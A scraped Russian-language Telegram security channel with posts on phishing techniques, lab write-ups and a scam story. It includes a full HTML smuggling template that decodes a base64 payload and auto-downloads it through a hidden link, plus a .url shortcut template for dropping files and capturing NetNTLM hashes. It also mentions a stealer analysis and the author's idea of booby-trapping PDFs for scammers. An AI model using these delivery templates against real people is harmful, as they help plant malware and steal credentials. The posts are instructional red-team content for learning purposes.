Media is too big
VIEW IN TELEGRAM
Привет^3
Сегодня я расскажу о другой части моей работы -
Фишинг - это отправка мошеннических электронных писем с целью повлиять на жертву или заставить ее предоставить информацию , открытый файл или перейти по ссылкам.
Одной из актуальных техник является
Blob
Неизменяемый объект, который представляет собой необработанные данные.
Это создает
Затем создается
Далее, можно имитировать щелчок на якорном объекте с помощью метода
Пример
В данном примере содержимое файла будет закодировано в
#phishing@coffee_cube
Сегодня я расскажу о другой части моей работы -
Phishing.Фишинг - это отправка мошеннических электронных писем с целью повлиять на жертву или заставить ее предоставить информацию , открытый файл или перейти по ссылкам.
Одной из актуальных техник является
HTML Smuggling. Используя HTML5 и JavaScript можно доставить вредоносный файл на хост внутри HTML файла. В нем может содержаться большой бинарный объект JavaScript Blobs.Blob
Неизменяемый объект, который представляет собой необработанные данные.
var myBlob = new Blob([myData], {type: 'octet/stream'});
Это создает
Blob типа MIME octet/stream и заполняет данные, содержащиеся в myData. Затем создается
URL адрес из объекта Blob:
var myUrl = window.URL.createObjectURL(blob);
myAnchror.href = myUrl;
Далее, можно имитировать щелчок на якорном объекте с помощью метода
HTMLElement.click():
myAnchor.click()
Пример
В данном примере содержимое файла будет закодировано в
base64. В других постах приведу другие примеры для данной техники:3
<html>
<head>
<title>HTML smuggling demo</title>
</head>
<body>
<script>
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file = <!--payload in base64-->
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'payload.txt';
if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>
#phishing@coffee_cube
👨💻2✍1🔥1🤝1
Привет^3
Я считают, что отличный вариант названия тех, кто считает себе хакером, после скачивания
#memes@coffee_cube
Я считают, что отличный вариант названия тех, кто считает себе хакером, после скачивания
Kali Linux. Звучит гордо - калисты...#memes@coffee_cube
😁6🐳2😈1👨💻1💅1😎1
OS command injection, simple case.pdf
256.4 KB
Привет^3
Первая из лаб на тему инъекция из поборки от
#web #writeup
@coffee_cube
Первая из лаб на тему инъекция из поборки от
Port Swigger Academy. Достаточно простая для понимания. Далее пойдут SQL инъекции.#web #writeup
@coffee_cube
🔥2✍1👨💻1
This media is not supported in your browser
VIEW IN TELEGRAM
Привет^3
Так как сегодня первая лаба на
А сам разбор в комментах)
https://t.iss.one/coffee_cube/53?comment=90
#web #writeup
@coffee_cube
Так как сегодня первая лаба на
SQL инъекцию, то я не смог не добавить мем.А сам разбор в комментах)
https://t.iss.one/coffee_cube/53?comment=90
#web #writeup
@coffee_cube
👍4😁4❤2🔥1👨💻1
SQL injection vulnerability allowing login bypass.pdf
125.8 KB
Привет^3
Сегодня выкладывают последнюю райтап на лабу из подборки
#web #writeup
@coffee_cube
Сегодня выкладывают последнюю райтап на лабу из подборки
Server-side vulnerabilities. На днях соберу ссылки на все райтыпы в один список. А в понедельник будет разбор одного малваря на питоне.#web #writeup
@coffee_cube
✍1❤1🔥1👨💻1
Разбор малваря RedTiger Ste4ler.pdf
262.8 KB
Привет^3
Какое-то время назад ко мне в руки попал стиллер, написанный на
#rev #malware
@coffee_cube
Какое-то время назад ко мне в руки попал стиллер, написанный на
Python. Я решил его разобрать. К сожалению не успел посмотреть две функции, которые связаны с Discord. Этим я займусь чуть позже. Потенциально получится найти Discord-канал, на который эти данные сливаются, а также поковырять сайт, где эту тулу продают.#rev #malware
@coffee_cube
🔥6👨💻3👍2✍1🦄1
Exploiting path mapping for web cache deception.pdf
416.2 KB
Привет^3
Данная лаба показывает возможность кэшировать динмаческую страницу, для получения доступа к данным другого пользователя.
Напишите в комментариях: выкладывать разбора лаб на разные темы или последовательно на одну?
#web #writeup
@coffee_cube
Данная лаба показывает возможность кэшировать динмаческую страницу, для получения доступа к данным другого пользователя.
Напишите в комментариях: выкладывать разбора лаб на разные темы или последовательно на одну?
#web #writeup
@coffee_cube
🔥3✍1👨💻1
Media is too big
VIEW IN TELEGRAM
Привет^3
Сегодня хочу рассказать про интересное расширение для
Это файл ярлыка, содержащий ссылку на веб-страницу или адрес ресурса в интернете.
С помощью него можно загрузить вредоносный файл на атакуемую машину, а так же есть вариант получить
Шаблон файла:
Про то, как получить
#phishing
@coffee_cube
Сегодня хочу рассказать про интересное расширение для
Windows - .url.Это файл ярлыка, содержащий ссылку на веб-страницу или адрес ресурса в интернете.
С помощью него можно загрузить вредоносный файл на атакуемую машину, а так же есть вариант получить
NetNTLMv1/v2 хеши.Шаблон файла:
[InternetShortcut]
IDList=
URL=<server ip addr>
HotKey=0
Про то, как получить
NetNTLM хеши и что с ними делать расскажу позже)#phishing
@coffee_cube
❤4🦄2🔥1👨💻1
Exploiting path delimiters for web cache deception.pdf
464.4 KB
Привет^3
Тема атаки
Оффтоп:
Писали ли вам на счет заработка в интернете связанную с отелями? Мне вот написали) Это 100% скам. Теперь думаю, а что с ними можно сделать? Буду рад вашим предложениям
#web #writeup
@coffee_cube
Тема атаки
Web cache deception показалась мне интересной, поэтому дальше буду выкладывать разбора лаб на данную тему.Оффтоп:
Писали ли вам на счет заработка в интернете связанную с отелями? Мне вот написали) Это 100% скам. Теперь думаю, а что с ними можно сделать? Буду рад вашим предложениям
#web #writeup
@coffee_cube
👨💻2✍1🔥1🤝1
Привет^3
Мне кажется, что всю удачу я променял на магнит для скаммеров. И так...
Мне написали с невероятно привлекательным предложением легко заработка в интернете. "Да кем я себя возомнил, чтобы отказаться от этого" - подумал я. Из важных вопросов был возраст и имя. Важно, чтобы возраст был больше 18.
Далее мне описали суть работы. Нужно повышать популярность отлей. Для этого нужно переходить по ссылкам и отправлять скриншоты. Работа не пыльная, смысла в ней тоже мало. Отправил 5 скринов. Теперь нужно связаться с другим менеджером для получения ЗП) Мне выдали код, который является последними 4 цифрами моего номера телефона. Совпадение - не думаю) И вот мне уже обещают 300 р. Перевел их мне на карту какой-то рандомный человек.
На второй день мне предложили зарабатывать "реальные деньги". Подсев на иглу легких денег я согласился) И вот, градус повышается. Теперь нужно бронировать номера, чтобы эмитировать загруженность. "Бронь" будут "отменять", а на "счет" будет начислен возврат и комиссия. Но для брони нужны деньги, подумает вы. И будете чертовски правы) Поэтому нужно выбрать сумму залога и отправить ее на номер картыни разу не подозрительно, но да ладно. Я выбрал 570 р. Думаю, что хватит на люкс)) Дальше только интереснее!
Нужно зарегистрироваться на сайте для бронированияМилорд, нужно больше золота. Бюджет на скамеров был исчерпан.
Итог. Я написал, что у меня нет денег и стал им не интересен. Есть мысль поковырять сайт и, по возможности, найти ручку для увеличения баланса, чтобы вернуться в эту историю для выяснения подробностей. Вся схема похожа на отмывание денег или проделки кардеров. В какой-то момент вас могут просто кинуть на те деньги, что были переведены другим людям. Так же может быть заблокирован ваш счет, если кто-то из жертв пожалуется(у меня есть ощущение, что жертвы сами перекидывают друг-другу деньги). Так же я приучил менеджера открывать
Будте аккуратны и не ведитесь на легкую наживу)
#memes #story_time
@coffee_cube
Мне кажется, что всю удачу я променял на магнит для скаммеров. И так...
Мне написали с невероятно привлекательным предложением легко заработка в интернете. "Да кем я себя возомнил, чтобы отказаться от этого" - подумал я. Из важных вопросов был возраст и имя. Важно, чтобы возраст был больше 18.
Далее мне описали суть работы. Нужно повышать популярность отлей. Для этого нужно переходить по ссылкам и отправлять скриншоты. Работа не пыльная, смысла в ней тоже мало. Отправил 5 скринов. Теперь нужно связаться с другим менеджером для получения ЗП) Мне выдали код, который является последними 4 цифрами моего номера телефона. Совпадение - не думаю) И вот мне уже обещают 300 р. Перевел их мне на карту какой-то рандомный человек.
На второй день мне предложили зарабатывать "реальные деньги". Подсев на иглу легких денег я согласился) И вот, градус повышается. Теперь нужно бронировать номера, чтобы эмитировать загруженность. "Бронь" будут "отменять", а на "счет" будет начислен возврат и комиссия. Но для брони нужны деньги, подумает вы. И будете чертовски правы) Поэтому нужно выбрать сумму залога и отправить ее на номер карты
Нужно зарегистрироваться на сайте для бронирования
https://www.radisson.top/. Внешний вид сайта выглядит ни разу не подозрительно. Очень плохая верстка, никакой валидации логина, почты, номера телефона. Ну это им и не нужно. Дальше нужно играть в игру: жмакаешь на кнопку получения заказа, клацаешь забронировать - все. Профит. Но я же говорил, что мне везет. Так вот, мне выпал чудесный номер за 4500 для бронирования с повышенной комиссией, но, к сожалению, на моем балансе нет денег для оплаты Итог. Я написал, что у меня нет денег и стал им не интересен. Есть мысль поковырять сайт и, по возможности, найти ручку для увеличения баланса, чтобы вернуться в эту историю для выяснения подробностей. Вся схема похожа на отмывание денег или проделки кардеров. В какой-то момент вас могут просто кинуть на те деньги, что были переведены другим людям. Так же может быть заблокирован ваш счет, если кто-то из жертв пожалуется(у меня есть ощущение, что жертвы сами перекидывают друг-другу деньги). Так же я приучил менеджера открывать
pdf файлы, что может пригодиться в будущем.Будте аккуратны и не ведитесь на легкую наживу)
#memes #story_time
@coffee_cube
🔥5✍4🤡1👨💻1👀1💅1